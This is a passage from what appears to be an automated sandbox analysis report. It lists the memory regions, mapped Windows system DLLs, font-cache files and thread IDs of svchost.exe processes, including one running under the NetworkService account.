0x40536dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004053620000" filename = "" Region: id = 1521 start_va = 0x40536e0000 end_va = 0x40537dffff entry_point = 0x0 region_type = private name = "private_0x00000040536e0000" filename = "" Region: id = 1522 start_va = 0x40537e0000 end_va = 0x4053b16fff entry_point = 0x40537e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1523 start_va = 0x4053b20000 end_va = 0x4053c1ffff entry_point = 0x0 region_type = private name = "private_0x0000004053b20000" filename = "" Region: id = 1524 start_va = 0x4053c20000 end_va = 0x4053d1ffff entry_point = 0x0 region_type = private name = "private_0x0000004053c20000" filename = "" Region: id = 1525 start_va = 0x4053d20000 end_va = 0x4053e1ffff entry_point = 0x0 region_type = private name = "private_0x0000004053d20000" filename = "" Region: id = 1526 start_va = 0x4053e20000 end_va = 0x4053e9ffff entry_point = 0x0 region_type = private name = "private_0x0000004053e20000" filename = "" Region: id = 1527 start_va = 0x4053ea0000 end_va = 0x4053f9ffff entry_point = 0x0 region_type = private name = "private_0x0000004053ea0000" filename = "" Region: id = 1528 start_va = 0x4053fa0000 end_va = 0x405409ffff entry_point = 0x0 region_type = private name = "private_0x0000004053fa0000" filename = "" Region: id = 1529 start_va = 0x40540a0000 end_va = 0x405419ffff entry_point = 0x0 region_type = private name = "private_0x00000040540a0000" filename = "" Region: id = 1530 start_va = 0x40541a0000 end_va = 0x405519ffff entry_point = 0x40541a0000 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 1531 start_va = 0x40551a0000 end_va = 0x4055215fff entry_point = 0x40551a0000 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 1532 start_va = 0x4055220000 end_va = 0x405531ffff entry_point = 0x0 region_type = private name = "private_0x0000004055220000" filename = "" Region: id = 1533 start_va = 0x4055320000 end_va = 0x405541ffff entry_point = 0x0 region_type = private name = "private_0x0000004055320000" filename = "" Region: id = 1534 start_va = 0x4055420000 end_va = 0x405551ffff entry_point = 0x0 region_type = private name = "private_0x0000004055420000" filename = "" Region: id = 1535 start_va = 0x4055700000 end_va = 0x40557fffff entry_point = 0x0 region_type = private name = "private_0x0000004055700000" filename = "" Region: id = 1536 start_va = 0x4055e20000 end_va = 0x4055efefff entry_point = 0x4055e20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1537 start_va = 0x4055f00000 end_va = 0x4055ffffff entry_point = 0x0 region_type = private name = "private_0x0000004055f00000" filename = "" Region: id = 1538 start_va = 0x4056000000 end_va = 0x40560fffff entry_point = 0x0 region_type = private name = "private_0x0000004056000000" filename = "" Region: id = 1539 start_va = 0x4056100000 end_va = 0x40561fffff entry_point = 0x0 region_type = private name = "private_0x0000004056100000" filename = "" Region: id = 1540 start_va = 0x4056200000 end_va = 0x40562fffff entry_point = 0x0 region_type = private name = "private_0x0000004056200000" filename = "" Region: id = 1541 start_va = 0x4056300000 end_va = 0x40563fffff entry_point = 0x0 region_type = private name = "private_0x0000004056300000" filename = "" Region: id = 1542 start_va = 0x4056400000 end_va = 0x40564fffff entry_point = 0x0 region_type = private name = "private_0x0000004056400000" filename = "" Region: id = 1543 start_va = 0x4056500000 end_va = 0x40565fffff entry_point = 0x0 region_type = private name = "private_0x0000004056500000" filename = "" Region: id = 1544 start_va = 0x4056600000 end_va = 0x40566fffff entry_point = 0x0 region_type = private name = "private_0x0000004056600000" filename = "" Region: id = 1545 start_va = 0x4056700000 end_va = 0x40567fffff entry_point = 0x0 region_type = private name = "private_0x0000004056700000" filename = "" Region: id = 1546 start_va = 0x4056800000 end_va = 0x40568fffff entry_point = 0x0 region_type = private name = "private_0x0000004056800000" filename = "" Region: id = 1547 start_va = 0x4056900000 end_va = 0x40569fffff entry_point = 0x0 region_type = private name = "private_0x0000004056900000" filename = "" Region: id = 1548 start_va = 0x4056a00000 end_va = 0x4056afffff entry_point = 0x0 region_type = private name = "private_0x0000004056a00000" filename = "" Region: id = 1549 start_va = 0x4056b00000 end_va = 0x4056bfffff entry_point = 0x0 region_type = private name = "private_0x0000004056b00000" filename = "" Region: id = 1550 start_va = 0x4056c00000 end_va = 0x40573fffff entry_point = 0x4056c00000 region_type = mapped_file name = "~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1462094071-1423818996-289466292-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat") Region: id = 1551 start_va = 0x7df5ff270000 end_va = 0x7ff5ff26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff270000" filename = "" Region: id = 1552 start_va = 0x7ff6e054c000 end_va = 0x7ff6e054dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e054c000" filename = "" Region: id = 1553 start_va = 0x7ff6e054e000 end_va = 0x7ff6e054ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e054e000" filename = "" Region: id = 1554 start_va = 0x7ff6e0550000 end_va = 0x7ff6e0551fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0550000" filename = "" Region: id = 1555 start_va = 0x7ff6e0552000 end_va = 0x7ff6e0553fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0552000" filename = "" Region: id = 1556 start_va = 0x7ff6e0554000 end_va = 0x7ff6e0555fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0554000" filename = "" Region: id = 1557 start_va = 0x7ff6e0556000 end_va = 0x7ff6e0557fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0556000" filename = "" Region: id = 1558 start_va = 0x7ff6e0558000 end_va = 0x7ff6e0559fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0558000" filename = "" Region: id = 1559 start_va = 0x7ff6e055a000 end_va = 0x7ff6e055bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e055a000" filename = "" Region: id = 1560 start_va = 0x7ff6e055c000 end_va = 0x7ff6e055dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e055c000" filename = "" Region: id = 1561 start_va = 0x7ff6e055e000 end_va = 0x7ff6e055ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e055e000" filename = "" Region: id = 1562 start_va = 0x7ff6e0560000 end_va = 0x7ff6e0561fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0560000" filename = "" Region: id = 1563 start_va = 0x7ff6e0564000 end_va = 0x7ff6e0565fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0564000" filename = "" Region: id = 1564 start_va = 0x7ff6e0566000 end_va = 0x7ff6e0567fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0566000" filename = "" Region: id = 1565 start_va = 0x7ff6e0568000 end_va = 0x7ff6e0569fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0568000" filename = "" Region: id = 1566 start_va = 0x7ff6e056a000 end_va = 0x7ff6e056bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e056a000" filename = "" Region: id = 1567 start_va = 0x7ff6e056c000 end_va = 0x7ff6e056dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e056c000" filename = "" Region: id = 1568 start_va = 0x7ff6e056e000 end_va = 0x7ff6e056ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e056e000" filename = "" Region: id = 1569 start_va = 0x7ff6e0570000 end_va = 0x7ff6e066ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0570000" filename = "" Region: id = 1570 start_va = 0x7ff6e0670000 end_va = 0x7ff6e0692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0670000" filename = "" Region: id = 1571 start_va = 0x7ff6e0693000 end_va = 0x7ff6e0694fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0693000" filename = "" Region: id = 1572 start_va = 0x7ff6e0695000 end_va = 0x7ff6e0696fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0695000" filename = "" Region: id = 1573 start_va = 0x7ff6e0697000 end_va = 0x7ff6e0698fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0697000" filename = "" Region: id = 1574 start_va = 0x7ff6e0699000 end_va = 0x7ff6e069afff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0699000" filename = "" Region: id = 1575 start_va = 0x7ff6e069d000 end_va = 0x7ff6e069efff entry_point = 0x0 region_type = private name = "private_0x00007ff6e069d000" filename = "" Region: id = 1576 start_va = 0x7ff6e069f000 end_va = 0x7ff6e069ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e069f000" filename = "" Region: id = 1577 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1578 start_va = 0x7ffc4aee0000 end_va = 0x7ffc4aefdfff entry_point = 0x7ffc4aee0000 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 1579 start_va = 0x7ffc4af00000 end_va = 0x7ffc4af0cfff entry_point = 0x7ffc4af00000 region_type = mapped_file name = "bthtelemetry.dll" filename = "\\Windows\\System32\\BthTelemetry.dll" (normalized: "c:\\windows\\system32\\bthtelemetry.dll") Region: id = 1580 start_va = 0x7ffc4af10000 end_va = 0x7ffc4af27fff entry_point = 0x7ffc4af10000 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 1581 start_va = 0x7ffc4afc0000 end_va = 0x7ffc4afd3fff entry_point = 0x7ffc4afc0000 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 1582 start_va = 0x7ffc4b090000 end_va = 0x7ffc4b09dfff entry_point = 0x7ffc4b090000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1583 start_va = 0x7ffc4b170000 end_va = 0x7ffc4b1cefff entry_point = 0x7ffc4b170000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1584 start_va = 0x7ffc4b1d0000 end_va = 0x7ffc4b25cfff entry_point = 0x7ffc4b1d0000 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 1585 start_va = 0x7ffc4c270000 end_va = 0x7ffc4c279fff entry_point = 0x7ffc4c270000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1586 start_va = 0x7ffc4c450000 end_va = 0x7ffc4c467fff entry_point = 0x7ffc4c450000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 1587 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1588 start_va = 0x7ffc4dab0000 end_va = 0x7ffc4daccfff entry_point = 0x7ffc4dab0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1589 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1590 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1591 start_va = 0x7ffc50bf0000 end_va = 0x7ffc50bfbfff entry_point = 0x7ffc50bf0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 1592 start_va = 0x7ffc50fa0000 end_va = 0x7ffc50fc8fff entry_point = 0x7ffc50fa0000 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 1593 start_va = 0x7ffc50fd0000 end_va = 0x7ffc51173fff entry_point = 0x7ffc50fd0000 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 1594 start_va = 0x7ffc516e0000 end_va = 0x7ffc51759fff entry_point = 0x7ffc516e0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1595 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1596 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1597 start_va = 0x7ffc51cb0000 end_va = 0x7ffc51cc7fff entry_point = 0x7ffc51cb0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1598 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1599 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1600 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1601 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1602 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1603 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1604 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1605 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1606 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1607 start_va = 0x7ffc54440000 end_va = 0x7ffc544d7fff entry_point = 0x7ffc54440000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1608 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1609 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1610 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1611 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1612 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1613 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1614 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1615 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1616 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1617 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1618 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1619 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1620 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1621 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1622 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1623 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1624 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1625 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1626 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3372 start_va = 0x4055520000 end_va = 0x405561ffff entry_point = 0x0 region_type = private name = "private_0x0000004055520000" filename = "" Region: id = 3373 start_va = 0x4057400000 end_va = 0x4057bfffff entry_point = 0x4057400000 region_type = mapped_file name = "~fontcache-s-1-5-18.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-18.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-18.dat") Region: id = 3374 start_va = 0x7ff6e069b000 end_va = 0x7ff6e069cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e069b000" filename = "" Region: id = 3375 start_va = 0x7ffc467a0000 end_va = 0x7ffc467b1fff entry_point = 0x7ffc467a0000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Thread: id = 296 os_tid = 0x850 Thread: id = 297 os_tid = 0x834 Thread: id = 298 os_tid = 0x830 Thread: id = 299 os_tid = 0x760 Thread: id = 300 os_tid = 0x6f4 Thread: id = 301 os_tid = 0x6ec Thread: id = 302 os_tid = 0x6c8 Thread: id = 303 os_tid = 0x6c4 Thread: id = 304 os_tid = 0x6c0 Thread: id = 305 os_tid = 0x6bc Thread: id = 306 os_tid = 0x690 Thread: id = 307 os_tid = 0x584 Thread: id = 308 os_tid = 0x544 Thread: id = 309 os_tid = 0x540 Thread: id = 310 os_tid = 0x514 Thread: id = 311 os_tid = 0x190 Thread: id = 312 os_tid = 0x1a0 Thread: id = 313 os_tid = 0x118 Thread: id = 314 os_tid = 0x3f4 Thread: id = 315 os_tid = 0x3f0 Thread: id = 316 os_tid = 0x3e4 Thread: id = 317 os_tid = 0x39c Thread: id = 452 os_tid = 0xd44 Thread: id = 467 os_tid = 0xe44 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6d7a6000" os_pid = "0x250" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001069a" [0xc000000f], "LOCAL" [0x7] Region: id = 2225 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2226 start_va = 0xf60f9c0000 end_va = 0xf60f9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f60f9c0000" filename = "" Region: id = 2227 start_va = 0xf60f9d0000 end_va = 0xf60f9d0fff entry_point = 0xf60f9d0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2228 start_va = 0xf60f9e0000 end_va = 0xf60f9f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f60f9e0000" filename = "" Region: id = 2229 start_va = 0xf60fa00000 end_va = 0xf60fa7ffff entry_point = 0x0 region_type = private name = "private_0x000000f60fa00000" filename = "" Region: id = 2230 start_va = 0xf60fa80000 end_va = 0xf60fa83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f60fa80000" filename = "" Region: id = 2231 start_va = 0xf60fa90000 end_va = 0xf60fa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f60fa90000" filename = "" Region: id = 2232 start_va = 0xf60faa0000 end_va = 0xf60faa1fff entry_point = 0x0 region_type = private name = "private_0x000000f60faa0000" filename = "" Region: id = 2233 start_va = 0xf60fab0000 end_va = 0xf60fab0fff entry_point = 0x0 region_type = private name = "private_0x000000f60fab0000" filename = "" Region: id = 2234 start_va = 0xf60fac0000 end_va = 0xf60fac6fff entry_point = 0x0 region_type = private name = "private_0x000000f60fac0000" filename = "" Region: id = 2235 start_va = 0xf60fad0000 end_va = 0xf60fad0fff entry_point = 0x0 region_type = private name = "private_0x000000f60fad0000" filename = "" Region: id = 2236 start_va = 0xf60fae0000 end_va = 0xf60fae6fff entry_point = 0x0 region_type = private name = "private_0x000000f60fae0000" filename = "" Region: id = 2237 start_va = 0xf60faf0000 end_va = 0xf60faf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f60faf0000" filename = "" Region: id = 2238 start_va = 0xf60fb00000 end_va = 0xf60fbfffff entry_point = 0x0 region_type = private name = "private_0x000000f60fb00000" filename = "" Region: id = 2239 start_va = 0xf60fc00000 end_va = 0xf60fcbdfff entry_point = 0xf60fc00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2240 start_va = 0xf60fcc0000 end_va = 0xf60fd3ffff entry_point = 0x0 region_type = private name = "private_0x000000f60fcc0000" filename = "" Region: id = 2241 start_va = 0xf60fd40000 end_va = 0xf60fdfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f60fd40000" filename = "" Region: id = 2242 start_va = 0xf60fe00000 end_va = 0xf60fefffff entry_point = 0x0 region_type = private name = "private_0x000000f60fe00000" filename = "" Region: id = 2243 start_va = 0xf60ff00000 end_va = 0xf610087fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f60ff00000" filename = "" Region: id = 2244 start_va = 0xf610090000 end_va = 0xf610210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f610090000" filename = "" Region: id = 2245 start_va = 0xf610220000 end_va = 0xf61031ffff entry_point = 0x0 region_type = private name = "private_0x000000f610220000" filename = "" Region: id = 2246 start_va = 0xf610320000 end_va = 0xf61041ffff entry_point = 0x0 region_type = private name = "private_0x000000f610320000" filename = "" Region: id = 2247 start_va = 0xf610420000 end_va = 0xf61051ffff entry_point = 0x0 region_type = private name = "private_0x000000f610420000" filename = "" Region: id = 2248 start_va = 0xf610520000 end_va = 0xf61061ffff entry_point = 0x0 region_type = private name = "private_0x000000f610520000" filename = "" Region: id = 2249 start_va = 0xf610620000 end_va = 0xf61071ffff entry_point = 0x0 region_type = private name = "private_0x000000f610620000" filename = "" Region: id = 2250 start_va = 0xf610720000 end_va = 0xf61081ffff entry_point = 0x0 region_type = private name = "private_0x000000f610720000" filename = "" Region: id = 2251 start_va = 0xf610820000 end_va = 0xf61091ffff entry_point = 0x0 region_type = private name = "private_0x000000f610820000" filename = "" Region: id = 2252 start_va = 0xf610920000 end_va = 0xf610a1ffff entry_point = 0x0 region_type = private name = "private_0x000000f610920000" filename = "" Region: id = 2253 start_va = 0xf610a20000 end_va = 0xf610b1ffff entry_point = 0x0 region_type = private name = "private_0x000000f610a20000" filename = "" Region: id = 2254 start_va = 0xf610b20000 end_va = 0xf610c1ffff entry_point = 0x0 region_type = private name = "private_0x000000f610b20000" filename = "" Region: 